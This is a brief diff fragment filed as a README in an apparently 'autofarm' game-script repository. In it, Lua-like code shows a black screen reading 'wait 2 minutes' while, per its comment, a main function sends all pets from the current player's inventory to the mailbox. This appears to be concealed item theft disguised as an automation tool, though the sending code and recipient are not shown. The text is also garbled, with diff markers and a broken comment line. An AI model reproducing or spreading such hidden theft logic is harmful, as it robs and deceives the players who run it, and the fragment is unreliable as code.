dokinbog/autofram/README.md

     GUI.DrawText(screenWidth / 2, screenHeight / 2, text, "center") -- Draw text in the center
 end

--- Main function to send all pets from the current player’s inventory to the mailbox function main()
+function main()
     showBlackScreenWithText("wait 2 minutes")